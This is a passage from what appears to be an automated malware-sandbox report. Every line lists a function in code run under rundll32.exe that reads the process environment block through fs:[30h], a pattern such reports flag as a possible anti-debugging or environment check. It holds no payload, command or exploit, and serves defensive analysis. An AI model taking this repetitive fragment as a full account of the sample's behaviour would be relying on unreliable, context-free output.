                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF18B90 mov ecx, dword ptr fs:[00000030h]3_2_7EF18B90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF18B90 mov ecx, dword ptr fs:[00000030h]3_2_7EF18B90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1CB70 mov edx, dword ptr fs:[00000030h]3_2_7EF1CB70
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1CB70 mov eax, dword ptr fs:[00000030h]3_2_7EF1CB70
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF288C4 mov ecx, dword ptr fs:[00000030h]3_2_7EF288C4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF288C4 mov edx, dword ptr fs:[00000030h]3_2_7EF288C4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF38860 mov ecx, dword ptr fs:[00000030h]3_2_7EF38860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF38860 mov eax, dword ptr fs:[00000030h]3_2_7EF38860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF38860 mov edx, dword ptr fs:[00000030h]3_2_7EF38860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF38860 mov eax, dword ptr fs:[00000030h]3_2_7EF38860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF38860 mov ecx, dword ptr fs:[00000030h]3_2_7EF38860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1C820 mov edx, dword ptr fs:[00000030h]3_2_7EF1C820
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3A9E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF3A9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3A9E0 mov eax, dword ptr fs:[00000030h]3_2_7EF3A9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3A9E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF3A9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3A9E0 mov edx, dword ptr fs:[00000030h]3_2_7EF3A9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3A9E0 mov eax, dword ptr fs:[00000030h]3_2_7EF3A9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A980 mov edx, dword ptr fs:[00000030h]3_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A980 mov ecx, dword ptr fs:[00000030h]3_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A980 mov eax, dword ptr fs:[00000030h]3_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A980 mov eax, dword ptr fs:[00000030h]3_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A980 mov eax, dword ptr fs:[00000030h]3_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A980 mov eax, dword ptr fs:[00000030h]3_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A980 mov eax, dword ptr fs:[00000030h]3_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A980 mov edx, dword ptr fs:[00000030h]3_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A980 mov eax, dword ptr fs:[00000030h]3_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14954 mov ecx, dword ptr fs:[00000030h]3_2_7EF14954
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14954 mov ecx, dword ptr fs:[00000030h]3_2_7EF14954
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14954 mov edx, dword ptr fs:[00000030h]3_2_7EF14954
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF346E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF346E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov edx, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov ecx, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov edx, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D0 mov eax, dword ptr fs:[00000030h]3_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF6467B mov eax, dword ptr fs:[00000030h]3_2_7EF6467B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF6464A mov eax, dword ptr fs:[00000030h]3_2_7EF6464A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF64606 mov eax, dword ptr fs:[00000030h]3_2_7EF64606
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF1C4D0 mov edx, dword ptr fs:[00000030h]3_2_7EF1C4D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14464 mov edx, dword ptr fs:[00000030h]3_2_7EF14464
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14464 mov ecx, dword ptr fs:[00000030h]3_2_7EF14464
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF24430 mov ecx, dword ptr fs:[00000030h]3_2_7EF24430
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14400 mov edx, dword ptr fs:[00000030h]3_2_7EF14400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14400 mov ecx, dword ptr fs:[00000030h]3_2_7EF14400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14400 mov ecx, dword ptr fs:[00000030h]3_2_7EF14400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14400 mov ecx, dword ptr fs:[00000030h]3_2_7EF14400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14400 mov ecx, dword ptr fs:[00000030h]3_2_7EF14400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF14400 mov edx, dword ptr fs:[00000030h]3_2_7EF14400
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov ecx, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov ecx, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov eax, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov eax, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov eax, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov eax, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov eax, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov ecx, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov edx, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov ecx, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov eax, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E560 mov ecx, dword ptr fs:[00000030h]3_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF38560 mov eax, dword ptr fs:[00000030h]3_2_7EF38560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov edx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov eax, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov eax, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov eax, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov eax, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov eax, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov eax, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E0 mov ecx, dword ptr fs:[00000030h]3_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4C270 mov eax, dword ptr fs:[00000030h]3_2_7EF4C270
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3E200 mov ecx, dword ptr fs:[00000030h]3_2_7EF3E200
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF383B0 mov edx, dword ptr fs:[00000030h]3_2_7EF383B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6CC69C40 mov eax, dword ptr fs:[00000030h]5_2_6CC69C40
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA5F00 mov ecx, dword ptr fs:[00000030h]5_2_7FAA5F00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAABC90 mov ecx, dword ptr fs:[00000030h]5_2_7FAABC90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov eax, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov eax, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov ecx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 mov edx, dword ptr fs:[00000030h]5_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAB7C0 mov edx, dword ptr fs:[00000030h]5_2_7FAAB7C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8963F mov edx, dword ptr fs:[00000030h]5_2_7FA8963F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABAFE0 mov edx, dword ptr fs:[00000030h]5_2_7FABAFE0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABAFE0 mov eax, dword ptr fs:[00000030h]5_2_7FABAFE0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA92A30 mov edx, dword ptr fs:[00000030h]5_2_7FA92A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA92A30 mov ecx, dword ptr fs:[00000030h]5_2_7FA92A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA92A30 mov eax, dword ptr fs:[00000030h]5_2_7FA92A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA92A30 mov edx, dword ptr fs:[00000030h]5_2_7FA92A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA8860 mov ecx, dword ptr fs:[00000030h]5_2_7FAA8860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA8860 mov eax, dword ptr fs:[00000030h]5_2_7FAA8860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA8860 mov edx, dword ptr fs:[00000030h]5_2_7FAA8860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA8860 mov eax, dword ptr fs:[00000030h]5_2_7FAA8860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA8860 mov ecx, dword ptr fs:[00000030h]5_2_7FAA8860
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA83B0 mov edx, dword ptr fs:[00000030h]5_2_7FAA83B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAE200 mov ecx, dword ptr fs:[00000030h]5_2_7FAAE200
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA91CA0 mov eax, dword ptr fs:[00000030h]5_2_7FA91CA0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA7B60 mov ecx, dword ptr fs:[00000030h]5_2_7FAA7B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA7B60 mov eax, dword ptr fs:[00000030h]5_2_7FAA7B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA7B60 mov ecx, dword ptr fs:[00000030h]5_2_7FAA7B60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAB9A0 mov eax, dword ptr fs:[00000030h]5_2_7FAAB9A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov eax, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov edx, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov ecx, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov eax, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov ecx, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov edx, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov edx, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB58E0 mov edx, dword ptr fs:[00000030h]5_2_7FAB58E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAB7B0 mov eax, dword ptr fs:[00000030h]5_2_7FAAB7B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8D700 mov eax, dword ptr fs:[00000030h]5_2_7FA8D700
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA9770 mov eax, dword ptr fs:[00000030h]5_2_7FAA9770
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA916A0 mov edx, dword ptr fs:[00000030h]5_2_7FA916A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA916A0 mov eax, dword ptr fs:[00000030h]5_2_7FA916A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov edx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov edx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov edx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov eax, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov edx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov ecx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov ecx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov ecx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA97630 mov edx, dword ptr fs:[00000030h]5_2_7FA97630
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FACD438 mov ecx, dword ptr fs:[00000030h]5_2_7FACD438
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA87450 mov edx, dword ptr fs:[00000030h]5_2_7FA87450
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8D3B0 mov edx, dword ptr fs:[00000030h]5_2_7FA8D3B0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8709A mov eax, dword ptr fs:[00000030h]5_2_7FA8709A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA7090 mov eax, dword ptr fs:[00000030h]5_2_7FAA7090
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov ecx, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov ecx, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA99020 mov eax, dword ptr fs:[00000030h]5_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA87000 mov eax, dword ptr fs:[00000030h]5_2_7FA87000
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB6D80 mov edx, dword ptr fs:[00000030h]5_2_7FAB6D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB6D80 mov ecx, dword ptr fs:[00000030h]5_2_7FAB6D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB6D80 mov ecx, dword ptr fs:[00000030h]5_2_7FAB6D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB6D80 mov ecx, dword ptr fs:[00000030h]5_2_7FAB6D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB6D80 mov edx, dword ptr fs:[00000030h]5_2_7FAB6D80
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA86DF0 mov edx, dword ptr fs:[00000030h]5_2_7FA86DF0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA88B90 mov edx, dword ptr fs:[00000030h]5_2_7FA88B90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA88B90 mov ecx, dword ptr fs:[00000030h]5_2_7FA88B90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA88B90 mov ecx, dword ptr fs:[00000030h]5_2_7FA88B90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8CB70 mov edx, dword ptr fs:[00000030h]5_2_7FA8CB70
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8CB70 mov eax, dword ptr fs:[00000030h]5_2_7FA8CB70
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov edx, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov ecx, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov eax, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov eax, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov eax, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov eax, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov eax, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov edx, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A980 mov eax, dword ptr fs:[00000030h]5_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAA9E0 mov ecx, dword ptr fs:[00000030h]5_2_7FAAA9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAA9E0 mov eax, dword ptr fs:[00000030h]5_2_7FAAA9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAA9E0 mov ecx, dword ptr fs:[00000030h]5_2_7FAAA9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAA9E0 mov edx, dword ptr fs:[00000030h]5_2_7FAAA9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAAA9E0 mov eax, dword ptr fs:[00000030h]5_2_7FAAA9E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84954 mov ecx, dword ptr fs:[00000030h]5_2_7FA84954
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84954 mov ecx, dword ptr fs:[00000030h]5_2_7FA84954
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA84954 mov edx, dword ptr fs:[00000030h]5_2_7FA84954
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA988C4 mov ecx, dword ptr fs:[00000030h]5_2_7FA988C4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA988C4 mov edx, dword ptr fs:[00000030h]5_2_7FA988C4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA8C820 mov edx, dword ptr fs:[00000030h]5_2_7FA8C820
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA46E0 mov ecx, dword ptr fs:[00000030h]5_2_7FAA46E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov edx, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov ecx, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov edx, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D0 mov eax, dword ptr fs:[00000030h]5_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAD4606 mov eax, dword ptr fs:[00000030h]5_2_7FAD4606
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAD467B mov eax, dword ptr fs:[00000030h]5_2_7FAD467B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAD464A mov eax, dword ptr fs:[00000030h]5_2_7FAD464A
